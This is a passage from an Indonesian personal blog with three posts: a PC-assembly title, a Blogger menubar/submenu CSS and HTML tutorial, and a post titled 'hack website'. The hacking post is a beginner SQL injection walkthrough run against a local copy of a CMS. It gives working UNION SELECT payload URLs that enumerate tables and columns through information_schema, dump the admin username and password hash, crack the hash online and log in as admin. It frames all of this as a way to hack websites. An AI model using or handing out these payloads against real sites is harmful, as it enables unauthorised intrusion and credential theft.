Senin, 23 Februari 2015

cara merakit komputer dengan benar

Diposting oleh di Tidak ada komentar:

Rabu, 11 Februari 2015

Cara Mudah Membuat Menubar dan SubMenu di Blog

Cara Mudah Membuat Menubar dan SubMenu di Blog

Setelah kemarin saya membuat postingan tentang bagaimana cara membuat menubar di template klasik, kali ini saya kembali dengan judul Cara Mudah Membuat Menubar dan SubMenu di Blog. Membuat submenu bukanlah hal yang mudah tetapi dengan postingan ini saya rasa hal ini akan terasa mudah dan tidak menjadi hal sulit. Bagaimana cara membuatnya? Langsung saja anda ikuti langkah-langkah berikut :
1. Login pada blogger
2. masuk ke halaman Template
3. Edit HTML lalu Lanjutkan
4. Klik centang pada Expand Template Widget
5. Cari kode ]]></b:skin> (gunakan ctrl+f)
6. Pasang kode di bawah ini di atas kode ]]></b:skin>
#navbarmenu{width:930px; float:left; font-size:12px; color:#FFF; font-weight:bold; margin:0 auto; padding:0 auto} #nav{margin:0; padding:0} #nav ul{float:left; list-style:none; margin:0; padding:0} #nav li{list-style:none; margin:0; padding:0; background:none} #nav li a, #nav li a:link, #nav li a:visited{color:#992211; display:block; font-weight:normal; text-transform:normal; margin:0; padding:5px 15px 5px} #nav li a:hover{background:#4a4d4c; color:#FFF; margin:0; -moz-border-radius:8px; padding:5px 15px 5px; text-decoration:none} #nav li li a, #nav li li a:link, #nav li li a:visited{background:#FFF; -moz-border-radius:8px; width:150px; color:#992211; font-weight:normal; text-transform:normal; float:none; margin:0; padding:5px 10px 5px 15px; border-bottom:1px solid #4a4d4c; border-left:1px solid #4a4d4c; border-right:1px solid #4a4d4c} #nav li li a:hover{background: #4a4d4c; color:#FFF; padding:5px 10px 5px 15px} #nav li{float:left; padding:0} #nav li ul{z-index:9999; position:absolute; left:-999em; height:auto; width:170px; margin:0; padding:0} #nav li ul a{width:140px} #nav li ul ul{margin:-25px 0 0 171px} #nav li:hover ul ul, #nav li:hover ul ul ul, #nav li.sfhover ul ul, #nav li.sfhover ul ul ul{left:-999em} #nav li:hover ul, #nav li li:hover ul, #nav li li li:hover ul, #nav li.sfhover ul, #nav li li.sfhover ul, #nav li li li.sfhover ul{left:auto} #nav li:hover, #nav li.sfhover{position:static}
7. Selanjutnya cari kode <div id="content-wrapper">
8. Pasang kode di bawah ini di Atas kode yang bercetak tebal pada no 7 
<div id='menu'>
<div id='menu-wrap'>
<div id='navbarmenu'>
<ul id='nav'>
<li><a href="http://istiawanblog.blogspot.com">Home</a></li>
<li><a href="http://istiawanblog.blogspot.com/search/label/artikel">Artikel</a>
<ul>
<li><a href="http://istiawanblog.blogspot.com/search/label/tips%20karir">Tips Karir</a></li>
<li><a href="http://istiawanblog.blogspot.com/search/label/kesehatan">Kesehatan</a></li>
</ul>
</li>
<li><a href="http://istiawanblog.blogspot.com/search/label/tutorial">Tutorial Blog</a></li>
</ul>
</div>

9. Simpan Template dan lihat hasilnya

Keterangan :
  • Ganti tulisan yang berwarna Merah dengan url link menubar yang diinginkan, misal: link postingan, link kategori, link halaman statis atau lainnya 
  • Ganti tulisan berwarna Biru dengan tulisan judul menubar tersebut, seperti: Home, Artikel, Tutorial atau lainnya
Diposting oleh di 2 komentar:

Rabu, 04 Februari 2015

hack website

Mengetahui Username dan Password Admin Website



selamat malam, saat ini saya akan menjelaskan sebuah cara untuk meng-hack sebuah website.
cara ini disebut dengan "SQL INJECTION". cara ini sangat mudah untuk pemula seperti saya.

apa yang diperlukan?

  • Yet Another CMS sebagai target percobaan (Yet Another CMS)
  • xampp
  • text editor
  • web browser
setelah didownload cmsnya anda extract ke folder "\opt\lampp\htdocs\Hack\ (Ubuntu)
"c:\xampp\htdocs\Hack" (Windows).
berikut langkah langkahnya:
  1. buka file constants.php pada folder "Hack\includes\constants.php" menggunakan text editor seperti bluefish editor atau notepad++.
  2. edit di bagian berikut.
  3. buka phpmyadmin di web browser anda, kemudian masuk ke database hack, jika belum ada silahkan di buat terlebih dahulu. kemudian import database yang telah di sediakan cms pada folder "database\final_db.sql".
  4. buka web browser kembali lalu buka "http://localhost/Hack".
sekarang kita telah siap melakukan serangan ke website tersebut.

1. disini kita akan mencari dan menemukan celah keamanannya dengan melakukan test standa.
  • http://localhost/Hack/index.php?page=1
  • http://localhost/Hack/index.php?page=2
  • http://localhost/Hack/index.php?page=3
lalu kita lakukan test pada salah satu parameternya.

  • http://localhost/Hack/index.php?page=-1
dengan menambahkan tanda min (-) di belakang angka id.

2. mencari jumlah kolom dengan menggukan perintah "order by".
  • order by 1--
  • order by 2--
  • order by 3--
  • dst
lakukan cara itu secara terus menerus.

setelah mendapatka pesan error  seperti gambar di bawah!, maka kita telah mengetahui jumlah kolom dari databsenya berita adalah 6 karena saat meminta untuk ORDER BY kolom ke 7, terjadi error dengan kata lain, kolom ke 7 itu tidak ada.

3. setelah menemukan jumlah kolom, kini tugas selanjutnya menemukan angka error sebagai celah untuk mengintip ke isi database. 


dari proses tersebut, maka akan muncul angka error adalah 3 dan 6.


4. selanjutnya kita akan mencari informasi dasar database. karena website target memiliki dua angka error, maka kita akan mencari dua informasi sekaligus, yaitu versi MySQL dan nama databasenya.
berikit parameter yang digunakan:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,version(),4,5,database()--"

maka kita mendapatkan hasil:


dari gambar diatas kita mendapatkan nama database adalah "hack" dan versi MySQL-nya adalah 5.6.12.

5. selanjutnya kita harus mencari nama-nama tabel dengan melakukan "group" pada nama nama tabel di dalam database "hack" dengan menggunakan perintah "group_concat".

"http://localhost/Hack/index.php?page=-1 union all select 1,2,group_concat(table_name),4,5,6 from information_schema.tables where table_schema=database()--".


maka akan dapat hasil berikut:


pada gambar diatas kita menemukan nama nama tabelnya yaitu "pages", "subjects" dan "users".

6. selanjutnya untuk membuka isi dari tabel tersebut, kita akan menterjemahkan nama tabelnya yaitu "users" ke dalam format heksadesimal. (ascii to hexa).


setelah di terjemahkan maka kita akan mendapat angka heksadesimalnya yaitu "7573657273".

masukkan parameter berikut:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,group_concat(column_name),4,5,6 from information_schema.columns where table_name=0x7573657273--"

dari parameter di atas dapat hasil sebagai berikut:


dari gambar diatas, kita telah menemukan nama kolom dari tabel user, yaitu id, username, hashed_password.

7. berikutnya kita akan melihat isi dari kolom suatu tabelnya dengan langkah akhir adalah membuka isi kolom yang kita anggap ada infrmasi login adminnya.

berikut parameternya:

"http://localhost/Hack/index.php?page=-1 union all select 1,2,concat_ws(0x3a, username, hashed_password),4,5,6 from users--"


dari gambar diata kita telah mengetahui username dan password adminnya.
username : farockrdn
password : f57b455e08f1daebf152a1e07cdd6c1d831993d6

berikutnya kita akan melakukan deskripsi hash passwordnya dengan link penyedia MD5Decrypter.



dari gambar diatas terdapat bahwa password admin adalah "forgetful".

8. mencari page login adminnya, setelah kalian ketemu masukkan username dan password yang telah kita dapati sebelumnya.


selamat mencoba
Diposting oleh di Tidak ada komentar:
Langganan: Postingan (Atom)